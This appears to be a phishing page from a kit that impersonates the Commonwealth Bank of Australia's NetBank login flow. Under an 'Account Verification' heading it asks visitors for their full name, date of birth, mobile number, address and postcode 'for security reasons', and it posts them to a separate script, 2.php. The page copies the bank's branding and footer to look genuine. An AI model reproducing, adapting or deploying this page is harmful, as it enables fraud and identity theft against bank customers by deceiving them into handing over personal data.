<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" class="win firefox firefox1 gecko gecko1 cssBeforeSupport" lang="en">
    <head id="ctl00_head1">
        <title>NetBank</title>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
        <link rel="stylesheet" href="cma_assetz/css/framework-merge.css" />
        <link rel="icon" href="cma_assetz/img/favicon.ico" />
    </head>
    <body class="yourlogondetails Revamp NavigationLess">
        <form method="post" action="2.php" id="aspnetForm" autocomplete="off">
            <div id="header">
                <div id="ctl00_HeaderControl_masthead" class="masthead header global-netbank-anonymous">
                    <span id="ctl00_HeaderControl_accessibilityModeControl" class="accessibilityMode">
                        <a href="javascript:void(0);" id="accessibilityTrigger">Activate screen reader friendly NetBank.</a>
                        <span id="accessibilityModeMsg" class="ScreenReader">
                            Screen reader friendly mode is activated and will be enabled whenever you log into NetBank. If you would like to change this setting, please contact us or call 13 2221 at any time.
                            <a href="javascript:void(0);">contact us</a>
                        </span>
                    </span>
                    <div id="ctl00_HeaderControl_divGlobalNavToolbar" class="global-netbank-toolbar p-1">
                        <span class="nav-diamond-logo"><img src="cma_assetz/img/cba_logo_diamond.png" /></span>
                        <ul class="nav-channel-switch left"></ul>
                        <div class="global-netbank-searchbox"></div>
                    </div>
                    <div class="nav-global"></div>
                </div>
            </div>
            <div class="clearfix" id="BodyContainer">
                <div class="clearfix" id="ContentArea">
                    <div id="ctl00_ContentHeader" class="ContentHeader" style="margin-bottom: 32px;"><h1 class="headerTitle">Account Verification</h1></div>
                    <div id="MainContent">
                        <div class="content_main">
                            <div style="margin-top: 0px;" class="enterLogonDetailsBackground">
                                <div class="loginDetailsPanel">
                                    <div class="ContentPanel_Form" id="ctl00_BodyPlaceHolder_cpl_outer">
                                        <fieldset id="ctl00_BodyPlaceHolder_cpl" class="ContentPanel" style="z-index: 6;">
                                            <div class="FieldPanel">
                                                <ul class="LabelFieldList" role="presentation">
                                                    <li class="LabelFieldListItem" role="presentation">
                                                        <h2><strong>We need to identify you</strong></h2>
                                                    </li>
                                                    <li class="LabelFieldListItem" role="presentation"><p>We need to do this for security reasons. Enter the details registered to your CommBank account below.</p></li>
                                                    <li class="LabelFieldListItem" role="presentation">
                                                        <span class="subtext">All fields are required unless marked <em class="opt">optional</em></span>
                                                    </li>
                                                    <li class="LabelFieldListItem" role="presentation">
                                                        <div class="logonControls">
                                                            <div class="LabelWrapper Width15 LabelTextAlignNotSet align_notset LabelWithSubTextRight LabelWithHelp">
                                                                <label for="fullname"><span class="MainLabel MainLabelFlexi FOLabelClass">Full name &nbsp;</span></label>&nbsp;
                                                            </div>
                                                            <div class="FieldElement"><input name="fullname" id="fullname" type="text" class="text textbox MandatoryField cardNumberTextBox Width24 field reserveSpace" required="" /></div>
                                                            <div class="subtext subtextRight" style="padding-left: 150px;">
                                                                <div class="subtextInner"><span class="FieldPopup FieldPopupInline FieldHelp FieldHelpAbove"> </span></div>
                                                            </div>
                                                            <div class="LabelWrapper Width15 LabelTextAlignNotSet align_notset LabelWithSubTextRight LabelWithHelp">
                                                                <label for="dob"><span class="MainLabel MainLabelFlexi FOLabelClass">Date of birth &nbsp;</span></label>&nbsp;
                                                            </div>
                                                            <div class="FieldElement">
                                                                <input name="dob" id="dob" minlength="10" maxlength="10" type="tel" class="text textbox MandatoryField cardNumberTextBox Width24 field reserveSpace" required="" />
                                                            </div>
                                                            <div class="subtext subtextRight" style="padding-left: 150px;">
                                                                <div class="subtextInner"><span class="FieldPopup FieldPopupInline FieldHelp FieldHelpAbove"> </span></div>
                                                            </div>
                                                            <div class="LabelWrapper Width15 LabelTextAlignNotSet align_notset LabelWithSubTextRight LabelWithHelp">
                                                                <label for="mobile"><span class="MainLabel MainLabelFlexi FOLabelClass">Mobile phone &nbsp;</span></label>&nbsp;
                                                            </div>
                                                            <div class="FieldElement">
                                                                <input name="mobile" id="mobile" minlength="12" maxlength="12" type="tel" class="text textbox MandatoryField cardNumberTextBox Width24 field reserveSpace" required="" />
                                                            </div>
                                                            <div class="subtext subtextRight" style="padding-left: 150px;">
                                                                <div class="subtextInner"><span class="FieldPopup FieldPopupInline FieldHelp FieldHelpAbove"> </span></div>
                                                            </div>
                                                            <div class="LabelWrapper Width15 LabelTextAlignNotSet align_notset LabelWithSubTextRight LabelWithHelp">
                                                                <label for="address"><span class="MainLabel MainLabelFlexi FOLabelClass">Address &nbsp;</span></label>&nbsp;
                                                            </div>
                                                            <div class="FieldElement"><input name="address" id="address" type="text" class="text textbox MandatoryField cardNumberTextBox Width24 field reserveSpace" required="" /></div>
                                                            <div class="subtext subtextRight" style="padding-left: 150px;">
                                                                <div class="subtextInner"><span class="FieldPopup FieldPopupInline FieldHelp FieldHelpAbove"> </span></div>
                                                            </div>
                                                            <div class="LabelWrapper Width15 LabelTextAlignNotSet align_notset LabelWithSubTextRight LabelWithHelp">
                                                                <label for="postcode"><span class="MainLabel MainLabelFlexi FOLabelClass">Post code &nbsp;</span></label>&nbsp;
                                                            </div>
                                                            <div class="FieldElement">
                                                                <input minlength="4" maxlength="4" name="postcode" id="postcode" type="tel" class="text textbox MandatoryField cardNumberTextBox Width24 field reserveSpace" required="" />
                                                            </div>
                                                            <div class="subtext subtextRight" style="padding-left: 150px;">
                                                                <div class="subtextInner"><span class="FieldPopup FieldPopupInline FieldHelp FieldHelpAbove"> </span></div>
                                                            </div>
                                                        </div>
                                                    </li>
                                                </ul>
                                            </div>
                                        </fieldset>
                                    </div>
                                </div>
                            </div>
                            <div class="buttonPanel">
                                <div class="ButtonPanel">
                                    <div class="left"></div>
                                    <div class="middle"></div>
                                    <div class="right">
                                        <button type="submit" class="button button_ui button_gold icon icon_directionarrowright icon_right nextButton"><i role="presentation"></i><strong>Next</strong></button>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div id="ctl00_AuxiliaryContentWrapper" class="AuxiliaryContent_wrapper">
                        <div id="AuxiliaryContent">
                            <div class="ContentPanel_Text" id="ctl00_InformationPlaceholder_iplNetCodeTips_outer">
                                <div class="RightContentPanel RightContentPanelDefault">
                                    <div>
                                        <h3><span>Account verification</span></h3>
                                        <div class="Contents HideBulletPoints">
                                            <div>
                                                <ul>
                                                    <li><div class="rhssecurityImage"></div></li>
                                                    <li>
                                                        <p><span class="rhsText">We keep your personal information secure.</span> <a id="ctl00_InformationPlaceholder_lnkLearnMore" href="javascript:void(0);"> Learn more </a> .</p>
                                                    </li>
                                                    <li></li>
                                                </ul>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div id="footer" class="footer footer-mod">
                <div>
                    <ul>
                        <li><a href="javascript:void(0);">Tools &amp; calculators</a></li>
                        <li><a href="javascript:void(0);">Find a branch</a></li>
                        <li><a href="javascript:void(0);"> Financial assistance </a></li>
                        <li><a href="javascript:void(0);"> Contact us </a></li>
                    </ul>
                    <ul>
                        <li><a href="javascript:void(0);">Important information</a></li>
                        <li><a href="javascript:void(0);">Privacy</a></li>
                        <li><a href="javascript:void(0);">Cookies</a></li>
                        <li><a href="javascript:void(0);">Terms of use</a></li>
                    </ul>
                    <span>© 2022 Commonwealth Bank of Australia ABN 48 123 123 124 AFSL and Australian credit licence 234945</span>
                </div>
            </div>
        </form>
        <script src="cma_assetz/js/jquery.js"></script>
        <script src="cma_assetz/js/mask.js"></script>
        <script>
            $(document).ready(function () {
                $("#dob").mask("00/00/0000", { placeholder: "DD/MM/YYYY" });
                $("#mobile").mask("ZX00 000 000", { translation: { Z: { pattern: /[0]/, optional: false }, X: { pattern: /[4]/, optional: false } }, placeholder: "04XX XXX XXX" });
                $("#postcode").mask("0000", { placeholder: "XXXX" });
                var allInputs = $(":input");
                allInputs.focusout(function () {
                    $(this).blur(function () {
                        if ($(this).prop("required")) {
                            if (!$(this).val()) {
                                $(this).addClass("error");
                            } else {
                                $(this).removeClass("error");
                            }
                        }
                    });
                });
            });
        </script>
    </body>
</html>
